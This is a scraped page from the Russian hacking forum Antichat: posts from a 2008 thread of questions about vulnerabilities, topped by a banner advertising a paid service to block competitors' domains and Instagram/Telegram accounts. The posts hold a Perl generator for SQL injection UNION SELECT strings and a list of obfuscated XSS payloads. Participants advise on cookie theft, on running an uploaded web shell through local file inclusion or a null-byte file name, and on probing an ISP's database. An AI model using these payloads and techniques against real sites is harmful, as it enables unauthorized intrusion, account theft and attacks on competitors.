УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 84 из 1393

Опции темы

Поиск в этой теме

Опции просмотра

#831

28.01.2008, 14:50

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

чтоб не писать в ручную все колонки, скрипт забацал на вывод цифры и запятой до 146 штук

давно какт о тоже нопесал

Код:

#!/usr/bin/perl
while (1) {
print "\n\nNumber of columns\n";
$id = <STDIN>;
chomp ($id);
$x = 1;
print "-1+union+select+";
while ($x < $id) {
	print "$x,";
	$x++;
}
if ($x = $id) {
	print "$x/*";
}
}

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#832

28.01.2008, 15:13

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Цитата:

При проведении xss-кражи куков тебе возможно и не потребуются эти символы. Или тебе прямо обязательно нужен alert(99)?

Нет, необязателен алерт

Но, например,

Код:

var i=new Image();
...

уже не прокатит. Да и уязвимость в тэге a - есть желание запихать ксс в style, где юзается url() - также со скобками

#833

28.01.2008, 15:21

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

1)принудительно закрыть тег <a> и прописать <script>...</script>
2)

Код:

<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41">click</a>

Код:

=decoded=
<a href="javascript:alert('XSS')"></a>

Последний раз редактировалось AFoST; 28.01.2008 в 15:24..

#834

28.01.2008, 15:37

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Вот ещё несколько вариантов

Код:

<a href="&#106\;&#97\;&#118\;&#97\;&#115\;&#99\;&#114\;&#105\;&#112\;&#116\;&#58\;&#97\;&#108\;&#101\;&#114\;&#116\;&#40\;&#39\;&#88\;&#83\;&#83\;&#39\;&#41\;">click</a>

<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;">click</a>

<a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">click</a>

<a href="javascript:alert&#x28;xss&#x29;">click</a>

<a href="javascript:alert&#40\;xss&#41\;">click</a>

<A HREF="http://66.102.7.147/">click</A>

<A HREF="http://1113982867/">XSS</A>

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

все "\;" заменить на ;

Последний раз редактировалось AFoST; 28.01.2008 в 15:41..

#835

28.01.2008, 15:53

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Сенкс за наводку, попробую, но сразу скажу, там обрабатываются таким же образом и амперсанд, и кавычка, и апостроф (обратный апостроф не фильтруется)

#836

28.01.2008, 19:45

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Я загрузил на сервер шелл с именем img.php.gif
но сервер загрузил как img.php.1201468364.gif
каким образом мне запустить шелл?

__________________

BlackHat.

MoDL

#837

28.01.2008, 19:58

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

Ищи на сайте локальный инлкуд и инклудь свой шелл

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#838

28.01.2008, 20:19

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

Провел на форуме:
2030482

Репутация: 1796

Цитата:

Сообщение от Dimi4

Попробуй загрузить кратинку с именем img.php%00.gif
Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php

__________________

Кто я?..

#839

28.01.2008, 20:40

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Цитата:

Непрошло..
Кста стоит тама e107
я юзал вот ето
_http://milw0rm.com/exploits/4099

__________________

BlackHat.

MoDL

#840

29.01.2008, 17:28

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

Привет.У меня есть вопрос...

мой провайдер (raid.ru) использует какуюто особую программ
для работы пользователя с бд Programm ppo.c version 1.7
смог выжать конфиг в котором как понял прописаны все бд /var/www/db.raid.ru/cgi-bin/ora_agent.cfg
запросы формируются странным образом
https://db.raid.ru/cgi-bin/ppo/es_webface/point_access.services

es_webface название бд как я понял
point_access -хз
services -действие

если кто что знает подскажите...

Страница 84 из 1393

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход